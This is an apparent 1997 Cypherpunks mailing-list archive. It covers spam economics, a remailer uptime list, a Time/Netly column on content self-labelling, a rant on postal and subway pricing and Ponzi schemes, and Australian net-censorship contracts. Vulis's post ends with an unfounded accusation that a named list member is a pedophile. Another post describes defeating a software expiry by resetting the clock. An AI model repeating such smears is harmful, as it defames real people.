iQCVAwUBM+WKCKQK0ynCmdStAQFFrAP6AiPB4m2TfUb8k2TZOIQRbeb0N1KakLas
CaQ1IxbbTH6DA6qnVMK4zTJPmIyoMP4y/mkastSTrv9SAD5bXh2jv3zLdfgw96bi
626dadBoQEU/ymp5Iftd4T+OduQwhMzLZLD+lvRJYCJWjX343PISRZ14NtR3PmSV
JWUr1m6wpsE=
=e4wp
-----END PGP SIGNATURE-----






From dformosa at st.nepean.uws.edu.au  Mon Aug  4 05:40:27 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Mon, 4 Aug 1997 20:40:27 +0800
Subject: spam is good for you
In-Reply-To: <199708031314.PAA13935@basement.replay.com>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

Zooko Journeyman sez:
 
[...]
: My favorite 
: slogan so far is "I may disagree with every spam you send, but
: I will defend to the death your right to spam it. --Voltaire".

I may disagree with every spam you send, and I'm not going to fucking pay
for it.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+WPX6QK0ynCmdStAQFaTQP/X8JvveIds7+jsI8tpoHXdA9jWzRzEO+c
s3Y0LlINqZYzrOKxi5fUibwOGE2VulAG9U41f3MXeskTf6xgL6YH2MNZiyxuvGRB
YviNz2bhpHPXZzEIaAgLb8vwI9YJgqH1BrIjwIarrJyea2QqxwlXV8L2rDSSzSUT
AWCjb4YsXSM=
=CZmA
-----END PGP SIGNATURE-----






From dformosa at st.nepean.uws.edu.au  Mon Aug  4 05:40:41 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Mon, 4 Aug 1997 20:40:41 +0800
Subject: The Poor in Spirit
In-Reply-To: <3.0.2.32.19970803102828.0076fa60@panix.com>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 3 Aug 1997 frissell at panix.com wrote:

> In a free society, the "poor" have more money (collectively) than the rich
> and outbid them for resources all the time.  Were this not so, communities of
> the "poor" would never increase in size and yet they do.

Death must be popular, everybodies doing it.  If the poor where infact
powerfull thay would be less poor peaple not more.

> I can teach a poor person in America today the simple ways to triple or
> quadruple his income.

Attach your name to the end of this list and forward it to 5 others, in a
few days you will be rolling in cash.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+WRSqQK0ynCmdStAQGz9gQA1oZ9lTrjhvADOL7gSo5zS48RB85Cfvt0
+jcqqxZful5RFi81DMkNDU+YzZiXhzCuskaA6WXue59Mq/SlOdpWjukJWhyxr+IT
DinHXQjd9hvozEAGijVU4gAvkOrLRZjkoW4a0ZQReHy3TPZc6IAa8qiCsFZXcCPQ
+VI5R6bMsRE=
=UPYn
-----END PGP SIGNATURE-----






From ravage at ssz.com  Mon Aug  4 05:55:57 1997
From: ravage at ssz.com (Jim Choate)
Date: Mon, 4 Aug 1997 20:55:57 +0800
Subject: Tim 1 - Joichi 0 - DreamMonger NULL / Re: Joichi gives up (fwd)
Message-ID: <199708041244.HAA32722@einstein.ssz.com>



Forwarded message:

> Date: Mon, 04 Aug 1997 16:50:51 +0900
> From: Joichi Ito 
> Subject: Re: Tim 1 - Joichi 0 - DreamMonger NULL / Re: Joichi gives up
>   / Tim Throws a "Leaner" / Re: Tim Speaks the

> At 00:44 97/08/04 -0500, Jim Choate wrote:
> > Forwarded message:
> > 
> > > Date: Sun, 3 Aug 1997 22:02:24 -0700
> > > From: Tim May 
> > > Subject: Re: Tim Throws a "Leaner" / Re: Tim Speaks the Truth
> 
> > > Any journalist in Europe or in the U.S. would be seen as having
> irreparably
> > > compromised his journalistic objectivity by serving on such a panel! And
> > > properly so, of course.
> > 
> > As long as they were representing their personal opinions and not acting as
> > a journalist (ie being paid by a 3rd party) and they disclose the action
> > there would be compromise on objectivity.
> 
> Jim, I hope you meant to say "wound not be compromising" in the above
> statement.

Actualy it was supposed to be a question mark at the end...

> This may sound like an afterthought, but one of the reasons that I did
> such a stupid thing as post my association with a police study group 
> here was as a part of being very open about what I was doing and
> trying to ask for advice on that basis. Also, FYI, I am not being paid
> by the government or any 3rd party. I am not a "consultant" to the
> government. I am an "outside expert". I am not representing the police
> to the people of Japan, I am trying represent the peoples' interest to
> the government... but I'll stop now before I get bashed again.

If all it takes to take over the citizens of Japan is to bash them a little
then you folks are Doomed. Perhaps you have spent one too many days
hammering nails that stick up...

    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From cag1465 at onestopshop.net  Mon Aug  4 21:06:21 1997
From: cag1465 at onestopshop.net (Smitty)
Date: Mon, 4 Aug 1997 21:06:21 -0700 (PDT)
Subject: Online Merchant Accounts...Accept Credit Cards!  Low Rates!
Message-ID: <199708050406.VAA28351@toad.com>


Hi there,

Credit Cards are the universal currency of the Internet, and, if you want to do business online, you need to be able to Accept Visa, Mastercard and American Express cards on your Web site.

Trouble is, many banks won�t give merchant status to businesses that are new, home-based or located in cyberspace instead of a real-world storefront or mall.  That�s why we�re pleased to present a special offer from USConnect, a major merchant account provider that�s helping companies like yours get merchant status on the Net.


The benefits include:

* 2% Discount Rate

* No Monthly Minimum Billing Fee

* No Statement Fee if No Sales Made for the Month

* Money Available in 2 Business Days

* Windows-Based or Macintosh Compatible Credit Card Processing Software (Available)

* Shopping Cart System To Take Orders Securely Right On-Line (Available)

* Referral Program - $100-$200 Rewards For Each Referred Account

*And Much, Much More. . . .!

I invite you to browse our website for more information and registration:

Go to: Accept Credit Cards Online

Apply now and start your cash flowing today!




If you wish to be removed from our mailing list, please click "PLEASE REMOVE" 
and type REMOVE in the subject field.
  

























From raph at CS.Berkeley.EDU  Mon Aug  4 07:05:25 1997
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 4 Aug 1997 22:05:25 +0800
Subject: List of reliable remailers
Message-ID: <199708041350.GAA06363@kiwi.cs.berkeley.edu>



   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list at kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys at kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list at kiwi.cs.berkeley.edu.

$remailer{'cyber'} = ' alpha pgp';
$remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"jam"} = " cpunk mix pgp hash middle latent cut ek";
$remailer{"winsock"} = " cpunk pgp pgponly hash cut ksub reord ?";
$remailer{'nym'} = ' newnym pgp';
$remailer{"squirrel"} = " cpunk mix pgp pgponly hash latent cut ek";
$remailer{'weasel'} = ' newnym pgp';
$remailer{"reno"} = " cpunk mix pgp hash middle latent cut ek reord ?";
$remailer{"cracker"} = " cpunk mix remix pgp hash esub latent cut ek reord";
$remailer{'redneck'} = ' newnym pgp';
$remailer{"bureau42"} = " cpunk mix pgp hash latent cut ek";
$remailer{"neva"} = " cpunk pgp pgponly hash cut ksub ?";
$remailer{"lcs"} = " mix";
$remailer{"medusa"} = " mix middle"
$remailer{"McCain"} = " mix middle";
$remailer{"valdeez"} = " cpunk pgp pgponly hash ek";
$remailer{"arrid"} = " cpunk pgp pgponly hash ek";
$remailer{"hera"} = " cpunk pgp pgponly hash ek";
$remailer{"htuttle"} = " cpunk pgp hash latent cut post ek";
catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.
remailer at crynwr.com is _not_ a remailer.

There is no remailer at relay.com.

Groups of remailers sharing a machine or operator:
(cyber mix reno winsock)
(weasel squirrel medusa)
(cracker redneck)
(nym lcs)
(valdeez arrid hera)

The remailer list here has been out of date for some time, but should
be up to date now. I'm still working on updating the web page.

Last update: Mon 4 Aug 97 6:47:45 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
redneck  config at anon.efga.org             *##-+##**#**     4:41  99.98%
squirrel mix at squirrel.owl.de              -++-+------   2:40:53  99.96%
cracker  remailer at anon.efga.org           +++-++++++**    21:28  99.96%
weasel   config at weasel.owl.de             +++-+-+-+--   1:48:16  99.95%
cyber    alias at alias.cyberpass.net        **-++*****+*    11:47  99.88%
nym      config at nym.alias.net             *-+###*####+    20:38  99.88%
winsock  winsock at rigel.cyberpass.net      ------------  5:48:23  99.83%
mix      mixmaster at remail.obscura.com     -*-++***+*+*    46:32  99.80%
arrid    arrid at juno.com                   *++++-+- +    1:06:16  98.51%
replay   remailer at replay.com               *   ** ***-    15:25  97.91%
reno     middleman at cyberpass.net           +*+ +  +++-    55:18  93.85%
neva     remailer at neva.org                + +*--   ++*  2:52:22  92.55%
jam      remailer at cypherpunks.ca            +*--   +**  2:25:28  88.85%
hera     goddesshera at juno.com             --------  -   3:36:00  83.26%
valdeez  valdeez at juno.com                 ---           4:14:27  14.58%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien






From enoch at zipcon.net  Mon Aug  4 09:33:44 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Tue, 5 Aug 1997 00:33:44 +0800
Subject: Third Eternity Server Operational
Message-ID: <19970804162356.8660.qmail@zipcon.net>



There is a third eternity server at

               http://moloko.insync.net/eternity

Enjoy!

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From declan at well.com  Mon Aug  4 10:38:06 1997
From: declan at well.com (Declan McCullagh)
Date: Tue, 5 Aug 1997 01:38:06 +0800
Subject: "The Big Sellout," on self-labeling, from Time
Message-ID: 



Netly is running Josh Quittner's column in this week's
Time Magazine as our story today. It's about the perils
of self-labeling systems for the Net, especially for
news organizations. Stop by and check it out.

Also, on p48-49 of this week's magazine is a look at
censorware programs and public libraries. It's called
"Censor's Sensibility: Are Web filters valuable
watchdogs or just new online thought police?" Bruce van
Voorst and I worked on the story from the Washington
bureau. (It's not on pathfinder.com yet, so you'll have
to pick up a physical copy.)

Also, stop by our Netpolitics chat area where we're
discussing self-labeling and censorware:

  http://cgi.pathfinder.com:80/cgi-bin/boards/read/206/9

-Declan

---

http://pathfinder.com/netly/opinion/0,1042,1247,00.html

The Netly News Network (http://netlynews.com/)
August 4, 1997

The Big Sellout
by Joshua Quittner (quittner at pathfinder.com)

     The greatest threat to free speech these days is
coming from the most unlikely quarter: journalists.
It's happening - where else? - on the Net. A
self-appointed council of "industry representatives,"
including people from the Wall Street Journal, the
Newspaper Association of America, CNET, Wired and - no
surprise! - Microsoft, is debating whether the online
world might be a safer, happier place if a
subcommittee of the council decides what's news and
what's not. Anything deemed "not news" would be forced
to submit to a rating system or risk being blocked by
software browsers. And being blocked on the Web could
mean extinction for small, independent-minded online
publishers - the very folks who have benefited most
from the Internet revolution. The whole thing reeks of
the powerful beating up on the weak.

     The roots of the betrayal go back to June 1996,
when the notion of rating Web content first took off.
That was when Microsoft forced its myriad web sites to
adopt a system that analyzes content according to the
degree to which it contains sex, nudity, violence or
obscene language. The official reason for this was to
make the Net a "safe place" without government
censorship - which made sense, I guess, given that the
Supreme Court had not yet ruled the Communications
Decency Act unconstitutional.

     It also made good business sense for Microsoft to
adopt an idea that adds value to one of its key
products, the Internet Explorer. Explorer is the
second-most popular browser on the Web; a software
component that gives parents the option to filter out
the naughty bits is a big selling point. But what's
good business for the software industry is nonsense
for journalism - as the folks who run Microsoft's news
web site quickly realized.

[...]



-------------------------
Declan McCullagh
Time Inc.
The Netly News Network
Washington Correspondent
http://netlynews.com/







From dlv at bwalk.dm.com  Mon Aug  4 10:46:12 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 5 Aug 1997 01:46:12 +0800
Subject: non-censorous spam control (was Re: Spam is Information?)
In-Reply-To: <199707311743.SAA02470@server.test.net>
Message-ID: <8w6wae1w165w@bwalk.dm.com>



I'm back from the weekend to a large quantity of unanswered e-mail
which I'll get to eventually. if you said something of interest in
the last week or so, I'll comment on it this week - I hope.

But first I'll rant and rave some more on the subject of payment for
physical transportation and the snail mail, with the payment for the
Internet in mind.

Adam Back  writes:

> 
> William Geiger MLCVXII  writes:
> > In <199707311120.MAA00669 at server.test.net>, on 07/31/97 
> > >  at 12:20 PM, Adam Back  said:
> > >
> > >One way to implement this is for other people to pay the author for their
> > >articles a penny if they like the article.  That way people who write
> > >things which others find interesting to read get subsidized posting.  Is
> > >it still free speech if you have to pay for your posts if you're arguing
> > >for an unpopular minority?
> > 
> > This will not work!!!
> > 
> > Charging for e-mail/news posts will do nothing to prevent spam and
> > more than likely increase the noise on such lists. It is the spamers
> > who have the money to post volumns of their crap.
> 

As I think I pointed out before, the "spammers" would be more willing to
spend money to post than the folks who just talk and answer questions.
I wouldn't answer questions on comp.unix.questions if I had to pay to
do that. Any scheme that requires the poster to pay will dampen signal
more than it will damped the noise and thus worsed the signal to noise ratio.

> For email spam I disagree.  I currently get 10 spams a day or so.  All
> as a result of one unprotected post to a USENET group a few weeks
> back.  Before that I hadn't posted to USENET for a while and the spams
> had nearly died down.
> 
> If the spammer had to pay 1c for each spam, he'd be out of business
> with his current scatter gun approach.  He'd have to get a lot more
> selective, because it would be in his commercial interests to do so.

I've been getting dramatically less junk e-mail sent to the addresses which
I placed on the various "removal" lists. (Maybe 1 or 2 / day, vs 10-20 on
the 'control" ones.)
> 
> > Also I think you will find that it will be the fanatics who
> > will think it worth the $$$ to get their message out.
> 
> Fine by me, so long as they're paying their way, the NoCems from a
> reliable rating service will take care of them.
> 
> You have more of a point in newsgroups, or mailing lists as the
> spammer only has to make one post.
> 
> Charging for posts in that scenario only makes sense to stop people
> who spew multiple mega-bytes of robo-spam just to be annoying, and for
> no commercial gain at all.
> 
> NoCems are the real answer to public forums.  Spammers will feel less
> incentive to spam when it becomes clear most people have them filtered
> out anyway.
> 
> > While I find the various mailling lists & newsgroups of intrest the
> > majority of them are not thet intresting that I would be willing to pay
> > $$$ every time I post a reply to someones questions (most of my posts
> > outside of CP are answering questions on programming,crypto, & OS/2). I
> > think that the overall quality of the newsgroups would decline if you
> > started paying on a per-post basis.
> 
> Surely you aren't that prolific a writer that 1c a post would
> be a burden on you?
> 
> I make what 20 posts a day at peak?  Often 1 or none some days.
> 
> > It should be noted that the Bandwith issue is a red-herring. It is an
> > antiquated concept from the Fidonet days and does not apply. The bandwith
> > of the USENET has been *PAID IN FULL* by every subscriber to an ISP. The
> > ISP customers pay for their connections to their ISP who in turn pay for
> > their connections to the Access providers who inturn pay for the Backbone.
> > The PIPE has been paid for what goes over it not an issue. If all I want
> > to do with my T1 connection is ship *.jpg files via ftp 24/7 that is no
> > ones busines but my own. If I chooses to use my bandwith to transmit a
> > variety of file formats using various protocols
> > (HTTP,FTP,GOFFER,ARCHIE,...ect) who are you to say that some formats are
> > good and some are not!! (this is not even getting into the content of the
> > data being shiped).
> 
> That's interesting, and probably true, but still bandwidth is limited,
> see.  It is entirely possible for some idiots to consume vastly more
> than their share of the shared pipe.
> 
> Probably what you're saying is that you like a lot of other "power
> users" myself included use more bandwidth than the average neophyte.
> So you're in favor of flat charges because it represents a good deal
> for you.
> 
> Get me on a T1 and I use it, man.  Hmm, I'll just upgrade to gcc 2.7.x
> (10 megs later) and then I'll upgrade the OS (another 50 megs later),
> and so the day gos on.  Bandwidth hog.
> 
> Sitting on the end of this pay per second 28.8k PPP line really cramps
> my style :-) I've started buying linux CD sets, and upgrading OS less
> frequently.  I'm still on X32a (for linux people) even though it's
> expired and tried to disable it's self, I've hacked around the
> disablement (set the clock back 2 months for a couple of seconds while
> it's starting, and then forward again part way through seems to fix
> it) because I don't fancy the cost of 10 megs at 28.8k, nor the
> hassle.
> 
> Now I would be pretty happy to spend $500 - $1500 a year for a 64k
> leased line, or at least for a flat rate phone bill.  But nooo you
> can't get that in the UK.  You're looking at more like $10k once
> you've factored in leased line + bandwidth leasing.


Bill G wrote that the payment for (non-toll) roads is flat. This
isn't quite true. You see, the more you use a road, the more gasoline
you use up. When you buy gasoline, a very substantial portion of its
price are the taxes imposed by varous gubmint entities. A "toll-free"
road still brings revenues when it's used - the more traffic, the more
gas is burned, the more gas is bought, the more tax is paid. The funds
raised from gasoline taxes are supposed to be earmarked for highway
repairs and new construction.  Thus, the gubmint taxes you for every
mile you drive. Owners with less "fuel-efficient" cars are taxed more
heavily. All miles are equal, whether you drive on an interstate or
around your own backyard.  Tolls come in when the gubmint wants to
make a certain mile "more equal" than the other miles. E.g. in New
York City it costs $7 to cross the Verazzano bridge from Brooklyn
to Staten Island, but if you live on Staten Island, you can get a
discount. (By the way, this toll is used to subsidize the subway, 
which doesn't even go to Staten Island.)

Of course the U.S. highway infrastructure isn't getting adequate
maintenance anyway and is failing at an increasing rate.

The New York City subways/buses are an example of a true flat rate. 
Last months the system changed so that if you use a little plastic
card to pay your fare instead of the traditional token, you can
change for free between buses and subways.  Thus, someone who lives
and works in Manhattan and takes a subway for 1 or 2 stops pays the
same $1.50 as someone who takes the subway from Manhattan to the
outskirts of Queens and then changes to a bus. The argument is that
once the infrastructure is in place, the incremental cost of carrying
one more passenger doesn't depend much on how far he's going. The
real reason is that the users who benefit from this fare structure
are much more likely to vote Republican than the users who
subsidize them. :-) And NYC subways are still in a much worse shape
than the public transportation in cities where the fare depends on
the length of the trip (like Washington, DC, or London) or is
artificially low and can't cover the costs (like Moscow).

I might as well remind those still reading this rant that the reason
why NYC subways fell into such disrepair was political. When 3 private
companies built competing underground railroad systems in NYC in late
19th/early 20th century, they each charged a flat 5c for a ride and
had sufficient revenue for maintenance, new construction, and dividends
to the investors. Unfortunately, USD like any other currency is
subject to inflation. When the 3 companies tried to raise their fares
to match their rising costs, the New York City and State politicians
didn't let them. To keep the subway fare at 5c was the standard
promise of every politician running for NYC mayor in the first half
of the century. The subway companies were forced to operate at a loss
and were happy to turn over their trains to the Metropolitan
Transportation Authority - a piece of gubmint controlled by New York
State. Now that the gubmint owns the subways, the fares have been
rising much faster than the inflation. (I remember when the subway
cost 50c on a weekday, 25c on a weekend.) However the years of
neglect (blamed on the lack of capital) have left the subways in
a much worse shape, and the repairs are likely to cost more than
regular maintenance would have. (Just like the U.S. highway
infrastructure.)

And the cost of collecting the fares is a substantial one. (This is
also the case with long distance telephone calls - I believe that
flat-rate service, not wasting any resources on keeping track how
long a particular user has used a circuit, will prevail eventually.)
E.g. the MTA just spent close to $1B on installing new turnstiles
with card readers. Most users of New York City subways already pay
a special city income tax (not that I like it). Wouldn't it be more
"efficient" to make the subways "free", and to collect the funds
for running the subways from the "general" city and state taxes?
(Using taxes is the socialist solution; letting a private company
charge a flat fee for unlimited usage, if it so chooses, is the
efficient free market solution.)

Now on the subject of snail mail: someone asked why USPS is in the
business of censoring content (e.g. pyramid schemes). USPS has been
in this business for a long time. It refuses to deliver "obscene"
content, and in the past refused to deliver "birth control"
information (to a consenting recipient) judging it to be obscene.
Not too long ago USPS used to raid "competing" services, such
as FedEx, examine the contents of the letters, judge that they
weren't sufficiently "urgent" and should have sent via 1st class
mail (USPS's gubmint-granted monopoly), and harrass the sender
and the recipient. Not too long ago USPS seriously proposed
charging 1st class postage any time a fax machine was used.

Is USPS's postage "flat"? Obviously, they charge per piece of mail.
However is costs the same 32c to smail a first-class envelope under
a certain weight from Queens to Brooklyn or to Hawaii. Obviously, it
takes much more effort to deliver such a letter to HI than to Brooklyn.
The European tradition was to charge according to the distance the
letter was supposed to travel. I recall reading that in late 19th
century USPS simply did not deliver to rural areas - the farmer was
supposed to travel to his nearest post office to collect the mail.
There was a political battle in U.S. Congress, with "free rural
delivery" being the slogan of the politicians representing the
states with a lot of farmers, while the ones from the more urban
states did not want their contituents to subsidize the obviously
expensive rural delivery. Eventually the farmers won, resulting
in the birth of "mail order" industry - companies mass-mailing
catalogs and delivering good by mail (such as Sears), who were
in fact subsidized by the city dwellers who had to pay the same
postage to deliver a package across town than Sears paid to
deliver its catalog across the Great Plains.

It costs USPS much more to deliver an envelope with a handwritten
address than one with an OCR-readable address. That's why the senders
of "junk mail" (pre-sorted, with OCR-ready labels) are said to
subsidize the senders who scribble something on an envelope - even
though the "bulk" postage is less than "first class". USPS has
been talking about various schemes so people who mail a single
envelope with an OCR-ready address would get a smaller postage
hike than the "scribblers".

I'm not sure what all this means in terms of flat vs. metered
Internet fees, so in closing I'll rant about the pyramid schemes,
"airplane games", "earn money stuffing envelopes" scams, et al.
No gubmint should be in the business of declaring them to be
"illegal" any more than they should be declaring pornography, 
bomb-making  recipes, religious propaganda, or crypto programs
to be "illegal". 

You may recall that the first wide-known pyramid scheme was run
buy a chap named Ponzi in Boston. He collected money from 
"investors", and said he expected to pay back a handsome return
based on some "postal orders" business. He did in fact pay the
promised returns to the early invesors using the funds collected
from the later investors, until the rate at which he had to
pay out the old investors exceeded the rate at which he was
getting new investors. Ponzi was arrested, convicted of "fraud"
(because he was claiming that the returns came from "postal
orders" when in fact they didn't), spend a brief time in jail,
then moved to Florida where he made lots of money on the real
easte boom.

A similar scheme in Russia by an organizaton called "MMM", run 
by the Mavrodi bothers, left a large number of "investors"
holding the bag. Interestingly, one of the Mavrodi brothers
is now in Russian jail (awaiting trial), and the other one is
still running a pyramid scheme: he accepts "voluntary donations"
from an investor, in return for a "voluntary donation" at a later
date whose amount and time are not guaranteed and depend on
the "donations" collected from others. The Russian government
does not shut down Mavrodi's latest operation so far, claiming
it's not "fraud" since he doesn't misrepresent the source of
his returns nor the risks involved. Reportedly so far he's
getting oodles of investors and pretty good returns. Eventually
of course his scheme will collapse, but the "investors" who
got in and out early enough will have made good money.

A similar scheme recently brought down the government of Albania.
Reportedly the investors who got in late in the game and didn't
get the returns they expected (or actually lost their investments)
demanded that the gubmint reimburse them for their losses (by
taxing the money from the more intelligent Albanians). When
the idiots want the gubmint to protect them from their own
idiocy, the gubmint happily uses this excuse to screw not only
those who would fleece the idiots, but everyone.

The obvious moral of this extra-long rant is that gubmint of any
kind is a root of all evil and Kent Crispin sounds like a pedophile.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From apache at bear.apana.org.au  Mon Aug  4 11:05:29 1997
From: apache at bear.apana.org.au (Apache)
Date: Tue, 5 Aug 1997 02:05:29 +0800
Subject: How age and PICS ratings may go down...
In-Reply-To: <199708040231.TAA09298@you.got.net>
Message-ID: <199708041744.DAA13373@bear.apana.org.au>



    Tim May said:

>One way "voluntary" age ratings--very similar to PICS ratings--may be
>mandated is through the kind of "plea agreement" cited below. (I don't
>know if this site is real or not, but the post presents a scenario which
>will become more common, I think.)

In more controlled countries such as Australia which has no
constitutional protections to slow down the removal of individual
freedoms and rights (I won't go into discussion here that we actually
do have such protections inhereted from ancient British law dating
from first settlement, and in any case such arguments are ignored by
the government goons) the scenario is already common and perhaps even
the norm.

>Someone writes something, or has a site, and is busted for some charge.
>(There are many, even with what remains of the First Amendment. Child
>porn, obscenity, the new copyright laws, the Anti-Terrorism Act, etc.) A
>nolo contendre or guilty plea to a lesser charge is entered, with the
>agreement that an age verification system will be used, or a PICS rating,
>etc. And so the government gets the kind of censorship it wants.

Here in Australia this bargaining process has been pre-empted by the
traitors in parliament and in the recent report which mandates
"voluntary" labeling they give you a possible out to charges of having
rude pics, unsuitable language or whatever is the flavour of the week,
passing through your server specified in their version of a voluntary
(mandatory) code. As Irene states in her excellent page on the subject
(http://www.thehub.com.au/~rene/liberty/label2.html):

"Draft legislative proposals have suggested content providers may have
a defense against provision of restricted material to minors by taking
reasonable steps to prevent availability of same. It has been
intimated that labeling may a defense of good intent and content
providers may label material in the hope of having a defense. In fact,
in terms of labeling, a clearer indication of good intent would be
not to label material, thus ensuring it was not made available to
those using properly configured filtering software." 

>(Duncan will likely argue that this is impossible to enforce. Maybe in the
>limit, in the sense that some will fall through the cracks. But the
>dangers to anyone hosting words or pictures on their sites is very real.
>As more and more ISPs drop controversial material--think of several recent
>cases, and perhaps even the case of our own John Young--and as more child
>porn/celebrity nude/obscenity cases are filed....by the time the Thomases
>are both out of prison, most sites will likely be heavily editing
>themselves, imposing age limits, and using PICS ratings.)

Many service providers, attempting to stay afloat here, already have
such editing/age and other limits. Here is an extract of the first ISP
contract I examined after reading your post (these conditions appear
to be fairly standard) - Note especially cl4.2 prohibiting access to
"offensive" material which is not defined and would on the face of it
encompass any material, not just rude pictures, that may be offensive
to..well to who knows..:

[See: http://www.bit.net.au and note the proudly displayed "We rated
with RSACi" logo on the lead page."

"4. Compliance with Laws and other Conditions of Use  

4.1 The Subscriber acknowledges that use of the Data, Databases,
System and Services may from time to time be subject to certain legal
regulations, conditions (including any license conditions) and
restrictions. The Subscriber shall ascertain and comply with such
regulations, conditions (including any license conditions) or
restrictions including but not limited to those laid down by the
Crimes Act 1914 (Cth) and the Copyright Act 1968 (Cth).   

4.2 Without limiting clause 4.1, the Subscriber and each User shall
not send, access or download any Data which is offensive, defamatory
or which to the Subscriber's or User's knowledge contains any computer
virus or has not been classified or approved in accordance with any
applicable censorship or other laws.   

4.3 Without limiting clause 4.1, the Subscriber and each User shall
not, without proper authorisation, use the System or Services to gain
access to information in a restricted access computer system or to use
a restricted access computer system, or use the System or Services to
contribute to or aid the commission of a crime or to infringe the
rights of a third party."

Furthermore a duty is placed on the _subscriber_ to notify the
provider of the existence of certain material, including the existence
of "offensive" material, computer virii etc. Failure to so notify the
provider may cause you problems if a later search of your hardware or
a search of the providers temp files reveals you accessed such
information. No consulting fees are provided for in the agreement for
the subscribers time and expense providing such valuable data:

"8.1 The Subscriber shall notify the Company immediately upon becoming
aware of: any infringement of any third party's intellectual property
rights as a result of information being made available on a Database
or by use of the System or Services, the existence of any data, code,
program or other material of the kind referred to in clause 4.2 or any
use of the System or Software (by the Subscriber or any other person)
which may infringe clause 4.3."

It would be an interesting exercise to take out an account and
actually "immediately notify the Company" of such material. In just a
few hours of work a flood of material could be presented meeting such
a lose definition. Indeed a scan of my netscape cache for the last
couple of weeks would probably be enough to get me a free trip
downtown to visit the local goons with expensive court proceedings
required to attempt to avoid criminal sanctions for rather innocuous
web browsing habits. For an example where there was no evidence at all
against the subscriber but the cops performed a dawn raid on an
unsuspecting student (who was 14 months later found completely
innocent) based on the word of the ISP who was actively browsing
temporary files on the ISP's computer see:
http://www.thehub.com.au/~rene/liberty/qcaseone.html. It appears now
the student, who suffered immense financial as well as emotional
strain was merely a 'test case' to see how the new (a mere few days
old) net censorship laws would work. No doubt his sacrifice was for
the greater good of us all and to protect the leetle chiiiildren.

What amazes me is the time and money the traitors are prepared to
invest in attempting to prosecute such harmless activity performed in
one's own home. The fact that they are willing to do this indicates
the level of threat we all face from this scum and the level of
response that will be called for to surgically remove this cancer from
our respective countries. The threat in this country is far greater
than many might suspect in other jurisdictions as we are not schooled
in the writings of revolutionaries and early American presidents and
have no national psychosis of revolt nor any constitutional
guarantees (I know even these in the US are being subverted or
attacked but without them it's pretty grim). As can be seen from the
contract already referred to corporations are only too willing to lick
the rim the feeds them as they see no financial gain in attempting to
go against the flow. Indeed such a corporation would, with monopoly
control of telecommunications in Australia, quickly find itself
bankrupt.

The only conclusion I can draw is that our government and their
bedmates are very worried that people, through the internet, have the
ability to say (for now but not for long) what they wish about that
government, about anything and get that message out to many people
